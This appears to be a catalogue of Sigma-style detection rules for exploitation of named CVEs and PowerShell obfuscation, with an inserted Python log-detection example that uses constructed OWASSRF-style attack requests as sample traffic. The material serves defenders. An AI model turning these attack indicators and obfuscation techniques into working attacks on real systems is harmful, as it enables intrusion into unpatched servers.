  • Potential XXE Exploitation Attempt In JVM Based Application - Level: high
    Description: Detects XML parsing issues. If the application expects to work with XML, make sure that the parser is initialized safely.
  • Potential RCE Exploitation Attempt In NodeJS - Level: high
    Description: Detects process execution related errors in NodeJS. If the exceptions are caused by user input, then they may suggest an RCE vulnerability.
  • OpenCanary - FTP Login Attempt - Level: high
    Description: Detects instances where an FTP service on an OpenCanary node has had a login attempt.
  • OpenCanary - HTTP GET Request - Level: high
    Description: Detects instances where an HTTP service on an OpenCanary node has received a GET request.
  • OpenCanary - HTTP POST Login Attempt - Level: high
    Description: Detects instances where an HTTP service on an OpenCanary node has had a login attempt via form POST.
  • Python SQL Exceptions - Level: medium
    Description: Generic rule for SQL exceptions in Python according to PEP 249
  • Ruby on Rails Framework Exceptions - Level: medium
    Description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts
  • Spring Framework Exceptions - Level: medium
    Description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts
  • Potential SpEL Injection In Spring Framework - Level: high
    Description: Detects potential SpEL Injection exploitation, which may lead to RCE.
  • Suspicious SQL Error Messages - Level: high
    Description: Detects SQL error messages that indicate probing for an injection attack
  • Potential Server Side Template Injection In Velocity - Level: high
    Description: Detects exceptions in the Velocity template renderer; this most likely happens due to dynamic rendering of user input and may lead to RCE.
  • Suspicious SQL Query - Level: medium
    Description: Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities, such as dropping tables and selecting wildcard fields
  • New Network ACL Entry Added - Level: low
    Description: Detects that network ACL entries have been added to a route table which could indicate that new attack vectors have been opened up in the AWS account.
  • New Network Route Added - Level: medium
    Description: Detects the addition of a new network route to a route table in AWS.
  • Ingress/Egress Security Group Modification - Level: medium
    Description: Detects when an account makes changes to the ingress or egress rules of a security group. This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.
  • LoadBalancer Security Group Modification - Level: medium
    Description: Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate a misconfiguration allowing more traffic into the system than required, or that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.
  • RDS Database Security Group Modification - Level: medium
    Description: Detects changes to the security group entries for RDS databases. This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet or to a wider audience within the VPC, or that removal of valid rules has occurred, which could impact the availability of the database to legitimate services and users.
  • Suspicious OpenSSH Daemon Error - Level: medium
    Description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts
  • Suspicious Named Error - Level: high
    Description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts
  • Suspicious VSFTPD Error Messages - Level: medium
    Description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts
  • Atlassian Confluence CVE-2022-26134 - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
  • Apache Spark Shell Command Injection - ProcessCreation - Level: high
    Description: Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a command line perspective
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed gets created as a temp file in the /tmp folder with a scx* prefix. It is then invoked from the following directory: /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • DNS Query to External Service Interaction Domains - Level: high
    Description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
  • OMIGOD HTTP No Authentication RCE - Level: high
    Description: Detects the exploitation of OMIGOD (CVE-2021-38647), which allows remote command execution (RCE) as root with just a single unauthenticated HTTP request. Verify successful exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). The client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
  • Apache Threading Error - Level: medium
    Description: Detects an issue in Apache logs that reports threading related errors
  • F5 BIG-IP iControl Rest API Command Execution - Proxy - Level: medium
    Description: Detects POST requests to the F5 BIG-IP iControl REST API "bash" endpoint, which allows the execution of commands on the BIG-IP
  • Hack Tool User Agent - Level: high
    Description: Detects suspicious user agent strings used by hack tools in proxy logs
  • F5 BIG-IP iControl Rest API Command Execution - Webserver - Level: medium
    Description: Detects POST requests to the F5 BIG-IP iControl REST API "bash" endpoint, which allows the execution of commands on the BIG-IP
  • Successful IIS Shortname Fuzzing Scan - Level: medium
    Description: When IIS uses an old .NET Framework, it's possible to enumerate folders with the symbol "~"
  • Java Payload Strings - Level: high
    Description: Detects possible Java payloads in web access logs
  • JNDIExploit Pattern - Level: high
    Description: Detects exploitation attempt using the JNDI-Exploit-Kit
  • Path Traversal Exploitation Attempts - Level: medium
    Description: Detects path traversal exploitation attempts
  • SQL Injection Strings In URI - Level: high
    Description: Detects potential SQL injection attempts via GET requests in access logs.
  • Suspicious User-Agents Related To Recon Tools - Level: medium
    Description: Detects known suspicious (default) user-agents related to scanning/recon tools
  • Failed Logon From Public IP - Level: medium
    Description: Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
  • Suspicious File Drop by Exchange - Level: medium
    Description: Detects suspicious file type dropped by an Exchange component in IIS
  • Suspicious MSExchangeMailboxReplication ASPX Write - Level: high
    Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation
  • Suspicious Child Process Of SQL Server - Level: high
    Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
  • Remote Access Tool - ScreenConnect Server Web Shell Execution - Level: high
    Description: Detects potential web shell execution from the ScreenConnect server process.
  • Terminal Service Process Spawn - Level: high
    Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
  • Suspicious Process By Web Server Process - Level: high
    Description: Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
  • Suspicious Processes Spawned by WinRM - Level: high
    Description: Detects suspicious processes, including shells, spawned from the WinRM host process
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
  • CVE-2010-5278 Exploitation Attempt - Level: critical
    Description: MODx manager - Local File Inclusion: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
  • Fortinet CVE-2018-13379 Exploitation - Level: critical
    Description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
  • Pulse Secure Attack CVE-2019-11510 - Level: critical
    Description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
  • Citrix Netscaler Attack CVE-2019-19781 - Level: critical
    Description: Detects CVE-2019-19781 exploitation attempts against Citrix Netscaler, Application Delivery Controller and Citrix Gateway
  • Confluence Exploitation CVE-2019-3398 - Level: critical
    Description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
  • CVE-2020-0688 Exploitation Attempt - Level: high
    Description: Detects CVE-2020-0688 Exploitation attempts
  • CVE-2020-0688 Exchange Exploitation via Web Log - Level: critical
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-0688 Exploitation via Eventlog - Level: high
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass - Level: critical
    Description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt - Level: critical
    Description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
  • TerraMaster TOS CVE-2020-28188 - Level: high
    Description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
  • Cisco ASA FTD Exploit CVE-2020-3452 - Level: high
    Description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (successful exploitation)
  • Oracle WebLogic Exploit CVE-2020-14882 - Level: high
    Description: Detects exploitation attempts on WebLogic servers
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
  • Oracle WebLogic Exploit CVE-2021-2109 - Level: critical
    Description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
  • CVE-2021-21972 VSphere Exploitation - Level: high
    Description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
  • CVE-2021-21978 Exploitation Attempt - Level: high
    Description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
  • VMware vCenter Server File Upload CVE-2021-22005 - Level: high
    Description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
  • Fortinet CVE-2021-22123 Exploitation - Level: critical
    Description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
  • Pulse Connect Secure RCE Attack CVE-2021-22893 - Level: high
    Description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-26084, a Confluence RCE using OGNL injection
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
  • ProxyLogon Reset Virtual Directories Based On IIS Log - Level: critical
    Description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
  • Potential CVE-2021-27905 Exploitation Attempt - Level: medium
    Description: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
  • Exchange Exploitation CVE-2021-28480 - Level: critical
    Description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation - Level: critical
    Description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
  • ADSelfService Exploitation - Level: high
    Description: Detects suspicious access to URLs that were noticed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
  • LPE InstallerFileTakeOver PoC CVE-2021-41379 - Level: high
    Description: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt - Level: high
    Description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
  • Sitecore Pre-Auth RCE CVE-2021-42237 - Level: high
    Description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
  • Grafana Path Traversal Exploitation CVE-2021-43798 - Level: critical
    Description: Detects a successful Grafana path traversal exploitation
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon - Level: high
    Description: Detects potential initial exploitation attempts against VMware Horizon deployments running vulnerable versions of Log4j.
  • Log4j RCE CVE-2021-44228 Generic - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
  • Log4j RCE CVE-2021-44228 in Fields - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
  • Exchange ProxyShell Pattern - Level: high
    Description: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)
  • SonicWall SSL/VPN Jarrewrite Exploitation - Level: high
    Description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit
  • Exchange Exploitation Used by HAFNIUM - Level: high
    Description: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity
  • Potential CVE-2022-21587 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE - Level: medium
    Description: Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
  • CVE-2022-31659 VMware Workspace ONE Access RCE - Level: medium
    Description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass - Level: high
    Description: Detects the exploitation of the VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656. VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
  • Apache Spark Shell Command Injection - Weblogs - Level: high
    Description: Detects attempts to exploit the Apache Spark UI shell command injection (CVE-2022-33891) from a weblogs perspective
  • Atlassian Bitbucket Command Injection Via Archive API - Level: high
    Description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
  • Potential OWASSRF Exploitation Attempt - Proxy - Level: high
    Description: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint.
  • OWASSRF Exploitation Attempt Using Public POC - Proxy - Level: critical
    Description: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using the publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint.
  • Potential OWASSRF Exploitation Attempt - Webserver - Level: high
    Description: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint.
  • OWASSRF Exploitation Attempt Using Public POC - Webserver - Level: critical
    Description: Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using the publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint.
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 - Level: high
    Description: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 - Level: medium
    Description: Detects potential exploitation attempts of CVE-2023-1389, an unauthenticated command injection in TP-Link Archer AX21.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • Potential CVE-2023-2283 Exploitation - Level: medium
    Description: Detects potential exploitation attempts of CVE-2023-2283, an authentication bypass in libssh. The exploitation method causes an error message stating that keys for curve25519 could not be generated; that message indicates an exploitation attempt, not a successful exploitation.
  • Potential CVE-2023-23752 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2023-23752, an improper access check in web service endpoints in Joomla
  • Potential CVE-2023-25717 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2023-25717, a remote code execution via an unauthenticated HTTP GET request in Ruckus Wireless Admin
  • Potential CVE-2023-27997 Exploitation Indicators - Level: medium
    Description: Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as odd values of the "enc" parameter
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity - Level: high
    Description: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy - Level: high
    Description: Detects, in proxy logs, exploitation attempts of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web - Level: high
    Description: Detects, in access logs, exploitation attempts of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components.
  • CVE-2023-46747 Exploitation Activity - Proxy - Level: high
    Description: Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-46747 Exploitation Activity - Webserver - Level: high
    Description: Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: high
    Description: Detects exploitation attempts of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, in proxy logs by looking for a very long Host header string.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: medium
    Description: Detects potential exploitation attempts of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, in proxy logs.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: medium
    Description: Detects potential exploitation attempts of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, in webserver logs.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: high
    Description: Detects exploitation attempts of CVE-2023-4966, a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability, in webserver logs by looking for a very long Host header string.
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE - Level: high
    Description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)
  • CVE-2024-50623 Exploitation Attempt - Cleo - Level: high
    Description: Detects exploitation attempts of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawned by the Cleo software suite with a suspicious PowerShell command line.
  • OMIGOD SCX RunAsProvider ExecuteScript - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. The script being executed is created as a temp file in the /tmp folder with a scx* prefix, then invoked from the directory /etc/opt/microsoft/scx/conf/tmpdir/, where the file carries the same scx* prefix. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Multiple Suspicious Resp Codes Caused by Single Client - Level: medium
    Description: Detects possible exploitation activity or bugs in a web application
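The proxy- and webserver-log rules listed above (the OWASSRF indicators, the CVE-2023-4966 long Host header check, and the count of suspicious response codes from a single client) reduce to a few checks over parsed access-log records. The Python below is an added example written for this report; it is not a Sigma rule and not code from the Sigma project. The simplified log format, the Host-header length threshold (400), the set of suspicious status codes, the per-client count threshold (10) and the sample traffic are all assumptions constructed for the example.

```python
import re
from collections import Counter
from typing import Iterable, Optional
from urllib.parse import unquote

# Simplified W3C-style record (assumed format):
# <client-ip> <method> <uri> <host-header> <status>
LINE_RE = re.compile(
    r"^(?P<cip>\S+) (?P<method>\S+) (?P<uri>\S+) (?P<host>\S+) (?P<status>\d{3})$"
)

# Thresholds are assumptions for this example; tune them to your own baseline.
LONG_HOST_THRESHOLD = 400                 # "very long host header string"
SUSPICIOUS_STATUSES = {400, 401, 403, 500, 503}
MULTI_RESP_THRESHOLD = 10                 # per client, per log window

# Constructed sample traffic (not real logs): one OWASSRF-style request,
# one oversized Host header, one client producing many error responses.
SAMPLE_LOG = [
    "10.0.0.5 GET /owa/auth/logon.aspx mail.example.invalid 200",
    "10.0.0.7 POST /owa/mastermailbox%40example.invalid/powershell mail.example.invalid 200",
    "10.0.0.9 GET / " + "a" * 600 + " 200",
] + [
    f"10.0.0.11 GET /login?attempt={i} mail.example.invalid {401 if i % 2 else 403}"
    for i in range(12)
]


def parse(line: str) -> Optional[dict]:
    """Parse one record; return None for lines that do not fit the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def owassrf_indicator(rec: dict) -> bool:
    """OWA front end used to reach the PowerShell back end: both path
    fragments in one URI. URL-decode first so %2F-style encoding of the
    slashes does not slip past the substring match."""
    uri = unquote(rec["uri"]).lower()
    return "/owa/" in uri and "/powershell" in uri


def long_host_indicator(rec: dict) -> bool:
    """Host header far longer than any legitimate hostname."""
    return len(rec["host"]) >= LONG_HOST_THRESHOLD


def detect(lines: Iterable[str]) -> dict:
    """Run the per-record indicators and the per-client aggregation."""
    alerts = {"owassrf": [], "long_host": [], "multi_resp": []}
    error_counts: Counter = Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if owassrf_indicator(rec):
            alerts["owassrf"].append(rec["cip"])
        if long_host_indicator(rec):
            alerts["long_host"].append(rec["cip"])
        if rec["status"] in SUSPICIOUS_STATUSES:
            error_counts[rec["cip"]] += 1
    alerts["multi_resp"] = sorted(
        ip for ip, n in error_counts.items() if n > MULTI_RESP_THRESHOLD
    )
    return alerts


if __name__ == "__main__":
    for name, ips in detect(SAMPLE_LOG).items():
        print(f"{name}: {ips}")
```

The per-record checks fire on a single line; the response-code check only makes sense as an aggregation, which is why `detect` keeps a per-client counter and evaluates it after the window has been read. Real proxies normalise URIs differently, so decode before matching and check whether your log source records the Host header at all before relying on the length indicator.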
attack.t1027 110
Show Rules (110)
  • Invoke-Obfuscation RUNDLL LAUNCHER - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Rundll32 - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Base64 Encoded Listing of Shadowcopy - Level: high
    Description: Detects base64 encoded listing Win32_Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets - Level: high
    Description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
  • Potential PowerShell Base64 Encoded Shellcode - Level: medium
    Description: Detects potential powershell Base64 encoded Shellcode
  • Potential Xor Encoded PowerShell Command - Level: medium
    Description: Detects usage of "xor" or "bxor" in combination with a "foreach" loop. This pattern is often found in encoded PowerShell code and commands as a way to avoid detection
  • New Service Uses Double Ampersand in Path - Level: high
    Description: Detects a service installation that uses a suspicious double ampersand in the image path value
  • Decode Base64 Encoded Text - Level: low
    Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
  • Decode Base64 Encoded Text - MacOS - Level: low
    Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
  • Invoke-Obfuscation CLIP+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
  • Invoke-Obfuscation STDIN+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - Security - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Stdin - Security - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation Via Use Clip - Security - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - Security - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - Security - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Password Protected ZIP File Opened - Level: medium
    Description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
  • Password Protected ZIP File Opened (Suspicious Filenames) - Level: high
    Description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
  • Password Protected ZIP File Opened (Email Attachment) - Level: high
    Description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
  • Invoke-Obfuscation CLIP+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - System - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
  • Invoke-Obfuscation STDIN+ Launcher - System - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - System - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
  • Invoke-Obfuscation Via Stdin - System - Level: high
    Description: Detects Obfuscated Powershell via Stdin in Scripts
  • Invoke-Obfuscation RUNDLL LAUNCHER - System - Level: medium
    Description: Detects Obfuscated Powershell via RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Clip - System - Level: high
    Description: Detects Obfuscated Powershell via use Clip.exe in Scripts
  • Invoke-Obfuscation Via Use MSHTA - System - Level: high
    Description: Detects Obfuscated Powershell via use MSHTA in Scripts
  • Invoke-Obfuscation Via Use Rundll32 - System - Level: high
    Description: Detects Obfuscated Powershell via use Rundll32 in Scripts
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System - Level: high
    Description: Detects Obfuscated Powershell via VAR++ LAUNCHER
  • Potential Winnti Dropper Activity - Level: high
    Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
  • Suspicious Get-Variable.exe Creation - Level: high
    Description: Get-Variable is a valid PowerShell cmdlet. WindowsApps is by default in the path where PowerShell is executed, so when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the path and executes the malicious binary instead of the PowerShell cmdlet.
  • Invoke-Obfuscation CLIP+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Clip.exe to execute PowerShell
  • Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module - Level: high
    Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
  • Invoke-Obfuscation STDIN+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of stdin to execute PowerShell
  • Invoke-Obfuscation VAR+ Launcher - PowerShell Module - Level: high
    Description: Detects Obfuscated use of Environment Variables to execute PowerShell
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module - Level: medium
    Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
